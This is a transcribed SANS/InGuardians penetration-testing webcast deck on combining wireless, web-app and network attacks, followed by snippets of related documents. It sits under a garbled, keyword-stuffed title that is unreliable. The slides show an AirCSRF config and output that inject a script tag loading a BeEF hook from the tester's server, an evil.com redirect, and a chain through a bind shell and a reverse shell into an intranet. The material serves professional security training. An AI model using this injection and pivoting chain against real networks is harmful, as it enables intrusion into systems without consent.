How To Hack A Network With A Network Security Attack On A Web Browser (For A Free Download) (For Free) ( For A Free) On A Network) (On A Free Downloaded) (Or For A Paid Download) On An Ip
|
|
|
- Domenic Kennedy
- 5 years ago
- Views:
Transcription
1 The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part I Kevin Johnson, InGuardians Ed Skoudis, InGuardians Joshua Wright, InGuardians Copyright 2008, All Rights Reserved Version 4Q08 Combined Pen Testing , All Rights Reserved 1
2 Outline Penetration Testing Specialization But Wait Example of Combined Attack Conclusions Q&A Combined Pen Tests , All Rights Reserved 2
3 Categories of Penetration Testing Penetration tests are often separated into different types 1) Network penetration tests Name is a bit ambiguous, but widely used 2) Web application penetration tests 3) Wireless penetration tests 4) Social engineering tests 5) Physical penetration tests Others, but those are the biggies Let s focus on 1, 2, and 3 Combined Pen Tests , All Rights Reserved 3
4 Penetration Test Specialization Given that test scopes are often broken down into those categories and the skill sets for each category are rather different Most penetration testers choose one of these areas to focus on They may minor in another area, but most focus significantly on a major area Hi, I m a web app pen test guy Hi, I m a network pen test guy Hi, I m a wireless pen test guy This specialization is good a sign of a healthy, robust, and growing industry Combined Pen Tests , All Rights Reserved 4
5 Dealing With Specialization If you want to be a good pen tester, pick one of these categories and focus on it Build your skills, zooming in on the finegrained aspects of that kind of test We ll provide tips for improving your skills in the three big categories later If you want to procure good pen tests, make sure you get each of these types of tests performed Combined Pen Tests , All Rights Reserved 5
6 Outline Penetration Testing Specialization But Wait Example of Combined Attack Preparing for Combined Tests Conclusions Q&A Combined Pen Tests , All Rights Reserved 6
7 Not So Fast Over specialization has some significant problems: From a tester s perspective, being pigeon-holed careerwise From an enterprise perspective, missing huge sets of vulnerabilities from the other side But, perhaps most important, missing out on the risk posed by combined attacks As pen testers our job is to determine business risks by modeling, to the extent possible, the activities of real-world attackers Without taking a combined approach into account during testing, it can be difficult or impossible to determine and explain the true business risk associated with vulnerabilities Combined Pen Tests , All Rights Reserved 7
8 But, Doesn t Everyone Test This Way? Some of you are thinking that a combined approach is common Perhaps you are thinking about an example like this: A pen tester finds a rogue access point and gets access to the intranet The tester ping sweeps and port scans, finding an intranet web app On the internal web app, the tester finds a directory traversal flaw to read /etc/passwd, getting a list of users (not passwords) The tester then launches a password guessing attack via ssh, determines the password for an account, and then logs in with command shell access Doesn t everyone do this as part of a wireless test? No And, this example only scratches the surface we re talking about going very much deeper to discern the true risk Consider using the new-found ssh access to launch a local priv escalation attack to get UID 0 on the box Then, on the intranet web server, add content that includes browser scripts to run on admin browsers that surf there Then, use those browsers to well, let s not get ahead of ourselves Combined Pen Tests , All Rights Reserved 8
9 Outline Penetration Testing Specialization But Wait Example of Combined Attack Preparing for Combined Tests Conclusions Q&A Combined Pen Tests , All Rights Reserved 9
10 Guest Wireless Networks Many enterprises deploy wireless networks specifically for use by guests Conference rooms Front entrance waiting rooms Most guest networks have no encryption Even if the traffic is encrypted, attacker could try to break the crypto key Aircrack-ng, Cowpatty, etc. Sometimes, legitimate internal users rely on guest networks for a short period of time Mostly for convenience Combined Pen Tests , All Rights Reserved 10
11 Wireless Traffic Manipulation Pen-tester can manipulate clients on an open AP Impersonating responses, or requests Victim Pen Tester AP Google Internal Network Internet Time : SYN : SYN/ACK : ACK : GET HTTP/1.1\r\n : REDIRECT evil.com : OK Combined Pen Tests , All Rights Reserved 11
12 Traffic Manipulation Opportunities DNS spoofing inform victim that legitimate domain name maps to attacker s IP address Unencrypted session manipulation (telnet, ftp, other legacy) HTTP response manipulation Responding before legitimate site with HTTP 302 REDIRECT Responding after legitimate site, adding to HTTP response Combined Pen Tests , All Rights Reserved 12
13 Manipulating HTTP Responses WWW 3. Site sends legitimate response AP 1. Victim makes HTTP GET request to any web site Victim 2. Pen Tester spoofs server appending additional content to HTTP response <script language='javascript' src=' efmagic.js.php'></script> Pen Tester Combined Pen Tests , All Rights Reserved 13
14 AirCSRF ( Air, Sea, Surf ) Not-yet-released tool from Garland Glessner Automating wireless injection for XSS # cat aircsrf.conf Host: Name: Example AirCSRF Desc: Injects HTML below Stat: 1 Html: <script language= 'Javascript' src=' beef/hook/beefmagic.js.php'> </script> #./aircsrf -i wifi0 -r madwifing aircsrf v1.21 Detected: IEEE Headers Loading./aircsrf.conf ce5598ef INJECT for with CSRF payload of: <script language='javascript' src=' agic.js.php'></script> 0013ce5598ef took the bait for ( Combined Pen Tests , All Rights Reserved 14
15 Cross-Site Scripting Note that we ve injected a response that will direct the browser to fetch Javascript associated with BeEF A specialized browser script attack tool Most wireless and network pen testers usually ignore XSS That s just a web app thing why would a network or wireless pen tester care about it? But, XSS provides enormous access within a network Hooking browsers to pivot into the network Using browsers to exploit other services Combined Pen Tests , All Rights Reserved 15
16 Using XSS to Pivot into a Network Client machines provide new and exciting viewpoints to wireless and network penetration testers From the vantage point of a script inside a victim browser Browsers running an attacker s script can: Port scan a network Identify administrator machines Query browser history for links to known admin pages For example, consider VPN administrator URLs in browser history, which we can query for We can even look in browser history for pages accessed postauthentication Perform web vulnerability scans Reconfigure appliances and devices Deliver exploits to other servers the sky s the limit here! Combined Pen Tests , All Rights Reserved 16
17 Let s Look at a Scenario Suppose that a pen tester is evaluating the security of wireless networks in a pen test with a scope that includes combined attacks Pen tester discovers a wireless network set up for guest access from a conference room A legit administrator is using the guest wireless network temporarily Pen tester could hook that admin user s browser controlling it for all kinds of additional access Combined Pen Tests , All Rights Reserved 17
18 Internal Client Browser Used to Admin Important Systems Web Server Internal Server DNS Internet Target Network AP Firewall Infrastructure 0. Wireline client admins internal servers later it will go wireless Admin Client BeEF Controller Combined Pen Tests , All Rights Reserved 18
19 Use Wireless to Hook Browser Web Server Internal Server DNS AP Internet Firewall Infrastructure Target Network 1. Client uses guest wireless network to access anything BeEF Controller 1 & 2: Wireless pen test stuff 2. Attacker uses AirCSRF to inject BeEF XSS stub in response Admin Client Combined Pen Tests , All Rights Reserved 19
20 Control Browser and Fetch History Web Server Internal Server DNS Internet 4. Attacker accesses BeEF controller Firewall Infrastructure Target Network AP 3. Browser reports to BeEF controller BeEF Controller 5. BeEF with additional scripts harvests browser s history including links of browser-managed internal apps 3, 4, & 5: Web app pen test stuff Client Combined Pen Tests , All Rights Reserved 20
21 Using Hooked Browsers to Attack Other Targets Many protocols are forgiving They will ignore "junk" and HTTP request headers are often considered junk! BeEF allows for exploitation across protocols From a hooked browser running attacker s scripts, we can direct HTTP requests to target servers And possibly other protocols besides HTTP: FTP, RDP, VNC, SMB, etc. Payload of HTTP request is a service-side exploit, to be delivered from hooked browser to target server (possibly on intranet) BeEF injects a BindShell as an exploit payload Pen tester interacts with the shell Through BeEF controller application Controller runs on pen tester's server Combined Pen Tests , All Rights Reserved 21
22 Use Hooked Browser to Exploit Intranet Server 8 8. Send shell commands to execute on internal server 6 Web Server DNS Internal Server AP Internet 6. Attacker uses BeEF controller to tell victim browser to exploit internal server Firewall Infrastructure Target Network 7. Exploit internal server BeEF Controller 6, 7, & 8: Network pen test stuff Client Combined Pen Tests , All Rights Reserved 22
23 BeEF Exploit Module Interface Additional exploit modules can be added from Metasploit. Combined Pen Tests , All Rights Reserved 23
24 BeEF BindShell Interface Combined Pen Tests , All Rights Reserved 24
25 Use Shell on Internal Server to Attack Rest of Infrastructure 10. Use reliable reverse shell to tell system to scan internal network Web Server DNS Internal Server AP Internet 9. Send shell commands to get direct reverse shell access Firewall Infrastructure 11. Scan and exploit internal network BeEF Controller 9 & 10: Network pen test stuff 11 and beyond: Web app, network whatever Client Combined Pen Tests , All Rights Reserved 25
26 Outline Penetration Testing Specialization But Wait Example of Combined Attack Preparing for Combined Tests Conclusions Q&A Combined Pen Tests , All Rights Reserved 26
27 Dealing With Specialization REDUX If you want to be a great pen tester, make sure you can pivot between network pen tests, web app tests, and wireless pen tests Furthermore, integrate these attack vectors together into a combined attack If you want to procure great pen tests, make sure you explicitly require combined tests in the scope And, make sure testers present findings in terms of the business risk of combined attack vectors Combined Pen Tests , All Rights Reserved 27
28 Getting Up to Speed On Wireless Pen Testing Get to know the protocols (alphabet soup and MAC), 802.1X, EAP, RADIUS Know how to identify WPA, WPA2, WEP Wireshark is your BFF here (but not for Paris Hilton) Get to know attack tools and how they function Kismet, Metasploit, LORCON, Aircrack-ng, KARMA, Cowpatty, Very limited commercial tools for wireless pen-testing Get to know client functionality XP, Vista, and third-party clients all behave differently Did we mention Bluetooth, ZigBee, WiMax, RFID, proprietary,? Combined Pen Tests , All Rights Reserved 28
29 Getting Up to Speed On Network Pen Testing Get to know protocols TCP/IP, HTTP, SSL, LDAP, NetBIOS, SMB, , 802.1X, EAP Get to know command-lines and scripting within operating systems Cmd.exe (Painful we know we really really do) Bash Perl or Python or Ruby Get to know administration features of operating systems Windows, Linux, Unix Get to know exploitation tools and how exploits function Metasploit, Core IMPACT, Immunity Canvas Get to know how exploits and tools work and the languages that they are often written in C, C++, x86 Assembly Combined Pen Tests , All Rights Reserved 29
30 Getting Up to Speed On Web App Pen Testing Get to know the protocols HTTP and HTTPS (possibly others, depending on the application) Get to know various server-side scripting language ASP/.NET, Java, PHP, Cold Fusion, Perl, Ruby Basic web app development understanding Administration understanding Get to know client functionality Browsers and other third-party client software History, caching, cross-domain content restrictions, etc. Get to know client-side languages JavaScript, Flex, VBscript (did we mention painful?) Combined Pen Tests , All Rights Reserved 30
31 Outline Penetration Testing Specialization But Wait Example of Combined Tests Preparing for Combined Tests Conclusions Q&A Combined Pen Tests , All Rights Reserved 31
32 Conclusions Combined attack vectors allow for far deeper penetration into most target networks than separate vectors allow Combining web app, network, and wireless penetration testing is very powerful This combination provides a much more accurate view of the business risks posed by vulnerabilities than offered by completely separate network, wireless, and web app tests Consider pairing up people with complementary skills for tests We ve gone over one attack vector (guest wireless) and two tools (AirCSRF and BeEF) here In Parts II and III, we ll look at additional attack vectors and tools for further combining these three disciplines Combined Pen Tests , All Rights Reserved 32
33 Upcoming In-Depth SANS Pen Test Courses SANS 560: Network Pen Testing and Ethical Hacking Monterey, CA, Oct 31: Galbraith Eatontown, NJ, Nov 3: Skoudis San Antonio, TX, Nov 8: Conrad Washington DC, Dec 11: Skoudis Jan-March: 1 to 4 PM EST: Skoudis SANS 542: Web App Pen Testing and Ethical Hacking Washington DC, Dec 11: Johnson Vegas, Jan 26: Johnson SANS 617: Wireless Ethical Hacking, Pen Testing, and Defenses Washington DC, Dec 11: Luallen Orlando, FL, March 2: Wright Combined Pen Tests , All Rights Reserved 33
34 Outline Penetration Testing Specialization But Wait Example of Combined Tests Preparing for Combined Tests Conclusions Q&A Combined Pen Tests , All Rights Reserved 34
35 Questions? Follow-up discussion over the next week at the Ethical Hacker Network Look for Special Events under Forum Kevin, Ed, and Josh will participate in the discussion thread periodically Combined Pen Tests , All Rights Reserved 35
The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2
The Test Perfect Storm: Combining Network, Web App, and Wireless Test Techniques Part 2 By Joshua Wright, Kevin Johnson, & Ed Skoudis Copyright 2009, All Rights Reserved Version 1Q09 Testing Perfect Storm
The Pen Test Perfect Storm: Combining Network, Web App, and Wireless Pen Test Techniques Part 2
The Test Perfect Storm: Combining Network, Web App, and Wireless Test Techniques Part 2 By Joshua Wright, Kevin Johnson, & Ed Skoudis Copyright 2009, All Rights Reserved Version 1Q09 1 Outline The Power
How We're Getting Creamed
ed Attacks How We're Getting Creamed By Ed Skoudis June 9, 2011 ed Attacks - 2011 Ed Skoudis 1 $ cut -f5 -d: /etc/passwd grep -i skoudis Ed Skoudis Started infosec career at Bellcore in 1996 working for
Ethical Hacking as a Professional Penetration Testing Technique
Ethical Hacking as a Professional Penetration Testing Technique Rochester ISSA Chapter Rochester OWASP Chapter - Durkee Consulting, Inc. [email protected] 2 Background Founder of Durkee Consulting since 1996
Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities. By Ed Skoudis
Penetration Testing Ninjitsu 2: Crouching Netcat, Hidden Vulnerabilities By Ed Skoudis Copyright 2008, SANS Version 2Q08 Network Pen Testing & Ethical Hacking - 2008, Ed Skoudis 1 This Webcast and the
Pen Testing Perfect Storm Part 3-2009, InGuardians 1
June 1-2, 2009 Paris Hotel Las Vegas, NV www.sans.org/pentesting09_summit How are compliance requirements driving my pen testing strategies and how can I maximize my returns? What skills and techniques
The Pen Test Perfect Storm: We Love Microsoft! Pen Test Techniques Part 4
The Pen Test Perfect Storm: We Love Microsoft! Pen Test Techniques Part 4 By Ed Skoudis, Kevin Johnson, & Joshua Wright of InGuardians Hosted by Mike Yaffe of Core Copyright 2010, All Rights Reserved Version
Learn Ethical Hacking, Become a Pentester
Learn Ethical Hacking, Become a Pentester Course Syllabus & Certification Program DOCUMENT CLASSIFICATION: PUBLIC Copyrighted Material No part of this publication, in whole or in part, may be reproduced,
Securing Your Web Application against security vulnerabilities. Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group
Securing Your Web Application against security vulnerabilities Ong Khai Wei, IT Specialist, Development Tools (Rational) IBM Software Group Agenda Security Landscape Vulnerability Analysis Automated Vulnerability
Topics in Network Security
Topics in Network Security Jem Berkes MASc. ECE, University of Waterloo B.Sc. ECE, University of Manitoba www.berkes.ca February, 2009 Ver. 2 In this presentation Wi-Fi security (802.11) Protecting insecure
ETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
McAfee Certified Assessment Specialist Network
McAfee Certified Assessment Specialist Network Exam preparation guide Table of Contents Introduction 3 Becoming McAfee Certified 3 Exam Details 4 Recommended Exam Preparation 4 Exam Objectives 4 Sample
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting
https://elearn.zdresearch.com https://training.zdresearch.com/course/pentesting Chapter 1 1. Introducing Penetration Testing 1.1 What is penetration testing 1.2 Different types of test 1.2.1 External Tests
Vulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
What is Web Security? Motivation
[email protected] http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
Exam Questions SY0-401
Exam Questions SY0-401 CompTIA Security+ Certification http://www.2passeasy.com/dumps/sy0-401/ 1. A company has implemented PPTP as a VPN solution. Which of the following ports would need to be opened
CYBERTRON NETWORK SOLUTIONS
CYBERTRON NETWORK SOLUTIONS CybertTron Certified Ethical Hacker (CT-CEH) CT-CEH a Certification offered by CyberTron @Copyright 2015 CyberTron Network Solutions All Rights Reserved CyberTron Certified
Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008
Automated Penetration Testing with the Metasploit Framework NEO Information Security Forum March 19, 2008 Topics What makes a good penetration testing framework? Frameworks available What is the Metasploit
The Pen Test Perfect Storm Part 5: We Love Adobe!
The Pen Test Perfect Storm Part 5: We Love Adobe! By Ed Skoudis, Kevin Johnson, & Joshua Wright Hosted by Alex Horan of Core Copyright 2010, All Rights Reserved Version 1.0 1 Outline The Power of Combined
Application security testing: Protecting your application and data
E-Book Application security testing: Protecting your application and data Application security testing is critical in ensuring your data and application is safe from security attack. This ebook offers
Web application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
STABLE & SECURE BANK lab writeup. Page 1 of 21
STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
SAP: Session (Fixation) Attacks and Protections
www.taddong.com SAP: Session (Fixation) Attacks and Protections (in Web Applications) Raul Siles [email protected] April 15, 2011 VII OWASP Spain Chapter Meeting Copyright 2011 Taddong S.L. Todos los derechos
3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) [email protected] Open Web Application Security Project http://www.owasp.org
Rational AppScan & Ounce Products
IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation IBM Software Group The Alarming Truth CheckFree warns 5 million customers after hack http://infosecurity.us/?p=5168
(WAPT) Web Application Penetration Testing
(WAPT) Web Application Penetration Testing Module 0: Introduction 1. Introduction to the course. 2. How to get most out of the course 3. Resources you will need for the course 4. What is WAPT? Module 1:
Pwning Intranets with HTML5
Javier Marcos de Prado Juan Galiana Lara Pwning Intranets with HTML5 2009 IBM Corporation Agenda How our attack works? How we discover what is in your network? What does your infrastructure tell us for
The Top Web Application Attacks: Are you vulnerable?
QM07 The Top Web Application Attacks: Are you vulnerable? John Burroughs, CISSP Sr Security Architect, Watchfire Solutions [email protected] Agenda Current State of Web Application Security Understanding
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks
How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
Network Security Fundamentals
APNIC elearning: Network Security Fundamentals 27 November 2013 04:30 pm Brisbane Time (GMT+10) Introduction Presenter Sheryl Hermoso Training Officer [email protected] Specialties: Network Security IPv6
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?
Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis? This paper presents a scenario in which an attacker attempts to hack into the internal network
ASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
Web Request Routing. Technical Brief. What s the best option for your web security deployment?
Web Request Routing and Redirection What s the best option for your web security deployment? Choosing the right method for redirecting traffic to your secure web gateway is absolutely essential to maximize
Course Duration: 80Hrs. Course Fee: INR 7000 + 1999 (Certification Lab Exam Cost 2 Attempts)
Course Duration: 80Hrs. Course Fee: INR 7000 + 1999 (Certification Lab Exam Cost 2 Attempts) Course Module: 1. Introduction to Ethical Hacking 2. Footprinting a. SAM Spade b. Nslookup c. Nmap d. Traceroute
APNIC elearning: Network Security Fundamentals. 20 March 2013 10:30 pm Brisbane Time (GMT+10)
APNIC elearning: Network Security Fundamentals 20 March 2013 10:30 pm Brisbane Time (GMT+10) Introduction Presenter/s Nurul Islam Roman Senior Training Specialist [email protected] Specialties: Routing &
Certified Ethical Hacker Exam 312-50 Version Comparison. Version Comparison
CEHv8 vs CEHv7 CEHv7 CEHv8 19 Modules 20 Modules 90 Labs 110 Labs 1700 Slides 1770 Slides Updated information as per the latest developments with a proper flow Classroom friendly with diagrammatic representation
HackMiami Web Application Scanner 2013 PwnOff
HackMiami Web Application Scanner 2013 PwnOff An Analysis of Automated Web Application Scanning Suites James Ball, Alexander Heid, Rod Soto http://www.hackmiami.org Overview Web application scanning suites
Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security 560.2. Sans Mentor: Daryl Fallin
Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing SANS Security 560.2 Sans Mentor: Daryl Fallin http://www.sans.org/info/55868 Copyright 2010, All Rights Reserved Version 4Q10
2016 TÜBİTAK BİLGEM Cyber Security Institute
2016 Revision 5.0 2016 TÜBİTAK BİLGEM Cyber Security Institute 1 ... 3 1. Information Security Awareness for End Users... 4 2. Information Security Awareness for Managers... 5 3. Social Engineering: Attack
INFORMATION SECURITY TRAINING CATALOG (2016)
INFORMATICS AND INFORMATION SECURITY RESEARCH CENTER CYBER SECURITY INSTITUTE INFORMATION SECURITY TRAINING CATALOG (2016) Revision 4.0 2015 TÜBİTAK BİLGEM SGE Siber Güvenlik Enstitüsü P.K. 74, Gebze,
Web Security Testing Cookbook*
Web Security Testing Cookbook* Systematic Techniques to Find Problems Fast Paco Hope and Ben Walther O'REILLY' Beijing Cambridge Farnham Koln Sebastopol Tokyo Table of Contents Foreword Preface xiii xv
Application Security Best Practices. Wally LEE <[email protected]> Principal Consultant
Application Security Best Practices Wally LEE Principal Consultant 17/18 March 2009 Speaker Profile Wally LEE CISSP BS7799 Lead Auditor Certified Ultimate Hacking Instructor Certified
The Security Development Life Cycle
Intelligent Testing 18 June 2015 Declan O Riordan The Security Development Life Cycle Test and Verification Solutions Delivering Tailored Solutions for Hardware Verification and Software Testing The Systems
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications. Slides by Connor Schnaith
A Server and Browser-Transparent CSRF Defense for Web 2.0 Applications Slides by Connor Schnaith Cross-Site Request Forgery One-click attack, session riding Recorded since 2001 Fourth out of top 25 most
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
Wireless Security Overview. Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 [email protected]
Wireless Security Overview Ann Geyer Partner, Tunitas Group Chair, Mobile Healthcare Alliance 209-754-9130 [email protected] Ground Setting Three Basics Availability Authenticity Confidentiality Challenge
Penetration Testing Walkthrough
Penetration Testing Walkthrough Table of Contents Penetration Testing Walkthrough... 3 Practical Walkthrough of Phases 2-5... 4 Chose Tool BackTrack (Armitage)... 5 Choose Target... 6 Phase 2 - Basic Scan...
The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
Testing the OWASP Top 10 Security Issues
Testing the OWASP Top 10 Security Issues Andy Tinkham & Zach Bergman, Magenic Technologies Contact Us 1600 Utica Avenue South, Suite 800 St. Louis Park, MN 55416 1 (877)-277-1044 [email protected] Who Are
Reverse Shells Enable Attackers To Operate From Your Network. Richard Hammer August 2006
Reverse Shells Enable Attackers To Operate From Your Network Richard Hammer August 2006 Reverse Shells? Why should you care about reverse shells? How do reverse shells work? How do reverse shells get installed
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability
Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability WWW Based upon HTTP and HTML Runs in TCP s application layer Runs on top of the Internet Used to exchange
Finding and Preventing Cross- Site Request Forgery. Tom Gallagher Security Test Lead, Microsoft
Finding and Preventing Cross- Site Request Forgery Tom Gallagher Security Test Lead, Microsoft Agenda Quick reminder of how HTML forms work How cross-site request forgery (CSRF) attack works Obstacles
How to hack a website with Metasploit
How to hack a website with Metasploit By Sumedt Jitpukdebodin Normally, Penetration Tester or a Hacker use Metasploit to exploit vulnerability services in the target server or to create a payload to make
Attack and Penetration Testing 101
Attack and Penetration Testing 101 Presented by Paul Petefish [email protected] July 15, 2009 Copyright 2000-2009, Solutionary, Inc. All rights reserved. Version 2.2 Agenda Penetration Testing
Hack Proof Your Webapps
Hack Proof Your Webapps About ERM About the speaker Web Application Security Expert Enterprise Risk Management, Inc. Background Web Development and System Administration Florida International University
Web Application Firewall
Web Application Firewall Getting Started Guide August 3, 2015 Copyright 2014-2015 by Qualys, Inc. All Rights Reserved. Qualys and the Qualys logo are registered trademarks of Qualys, Inc. All other trademarks
RMAR Technologies Pvt. Ltd.
Course Name : StartXHack V2.0 Ethical Hacking & Cyber Security Course Duration : 2 Days (8Hrs./day) Course Fee : INR 1000/participant Course Module : 1. Introduction to Ethical Hacking a. What is Ethical
Kautilya: Teensy beyond shells
Kautilya: Teensy beyond shells Kautilya Toolkit for Teensy device Nikhil Mittal 1 P a g e Contents Kautilya Toolkit for Teensy device... 1 Nikhil Mittal... 1 Abstract... 3 Attack Surface and Scenarios...
Using Nessus In Web Application Vulnerability Assessments
Using Nessus In Web Application Vulnerability Assessments Paul Asadoorian Product Evangelist Tenable Network Security [email protected] About Tenable Nessus vulnerability scanner, ProfessionalFeed
INFORMATION SECURITY TRAINING CATALOG (2015)
INFORMATICS AND INFORMATION SECURITY RESEARCH CENTER CYBER SECURITY INSTITUTE INFORMATION SECURITY TRAINING CATALOG (2015) Revision 3.0 2015 TÜBİTAK BİLGEM SGE Siber Güvenlik Enstitüsü P.K. 74, Gebze,
Penetration Test JSPLC. Contact: James, APS (CCNA, CEH) contactep105t@secure- mail.biz
Contact: James, APS (CCNA, CEH) contactep105t@secure- mail.biz Ok, so this isn t the typical way that a pen test report would start, but we might as well get straight in to it. I am a customer of Sainsbury
Audience. Pre-Requisites
T R A N C H U L A S W O R K S H O P S A N D T R A I N I N G S Hands-On Penetration Testing Training Course About Tranchulas Tranchulas is a multinational information security company having its offices
How To Use Powerhell For Security Research
PowerShell David Kennedy (ReL1K) Josh Kelley (Winfang) http://www.secmaniac.com Twitter: dave_rel1k winfang98 About Josh Security Analyst with a Fortune 1000 --- Works with Dave Heavy experience in penetration
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
WHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
Ethical Hacking Course Layout
Ethical Hacking Course Layout Introduction to Ethical Hacking o What is Information Security? o Problems faced by the Corporate World o Why Corporate needs Information Security? Who is a Hacker? o Type
EECS 398 Project 2: Classic Web Vulnerabilities
EECS 398 Project 2: Classic Web Vulnerabilities Revision History 3.0 (October 27, 2009) Revise CSRF attacks 1 and 2 to make them possible to complete within the constraints of the project. Clarify that
Where every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
Web application security: automated scanning versus manual penetration testing.
Web application security White paper January 2008 Web application security: automated scanning versus manual penetration testing. Danny Allan, strategic research analyst, IBM Software Group Page 2 Contents
Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins
Recon and Mapping Tools and Exploitation Tools in SamuraiWTF Report section Nick Robbins During initial stages of penetration testing it is essential to build a strong information foundation before you
Network Access Security. Lesson 10
Network Access Security Lesson 10 Objectives Exam Objective Matrix Technology Skill Covered Exam Objective Exam Objective Number Firewalls Given a scenario, install and configure routers and switches.
CS 558 Internet Systems and Technologies
CS 558 Internet Systems and Technologies Dimitris Deyannis [email protected] 881 Heat seeking Honeypots: Design and Experience Abstract Compromised Web servers are used to perform many malicious activities.
I Hunt Penetration Testers!
I Hunt Penetration Testers! More Weaknesses in Tools and Procedures Wesley McGrew, Ph.D. Distributed Analytics and Security Institute Mississippi State University http://mcgrewsecurity.com [email protected]
Newsletter - September 2014. T o o l s W a t c h T e a m NJ OUCHN & MJ SOLER
Newsletter - September 2014 T o o l s W a t c h T e a m NJ OUCHN & MJ SOLER Tools! Lots of Tools Released! During September 2014, we published 7 Posts with 2 News Tools. Organized by Date OWASP Xenotix
Chapter 1 Web Application (In)security 1
Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is
Administrator Guide. v 11
Administrator Guide JustSSO is a Single Sign On (SSO) solution specially developed to integrate Google Apps suite to your Directory Service. Product developed by Just Digital v 11 Index Overview... 3 Main
KEVIN CARDWELL. Q/SA (Qualified Security Analyst) Penetration Tester. & Optional Q/PTL (Qualified Penetration Licence) Workshop
TECHNOLOGY TRANSFER PRESENTS KEVIN CARDWELL Q/SA (Qualified Security Analyst) Penetration Tester & Optional Q/PTL (Qualified Penetration Licence) Workshop MAY 18-22, 2009 VISCONTI PALACE HOTEL - VIA FEDERICO
Penetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: [email protected]
Penetration Testing Scope Factors
1 NZ PAPER LINUX AND WEB APPLICATION SECURITY Penetration Testing Scope Factors April 20, 2013 Zeeshan Khan NZPAPER.BLOGSPOT.COM 2 Abstract: This paper contains the key points of penetration testing. All
EVALUATING COMMERCIAL WEB APPLICATION SECURITY. By Aaron Parke
EVALUATING COMMERCIAL WEB APPLICATION SECURITY By Aaron Parke Outline Project background What and why? Targeted sites Testing process Burp s findings Technical talk My findings and thoughts Questions Project
Build Your Own Security Lab
Build Your Own Security Lab A Field Guide for Network Testing Michael Gregg WILEY Wiley Publishing, Inc. Contents Acknowledgments Introduction XXI xxiii Chapter 1 Hardware and Gear Why Build a Lab? Hackers
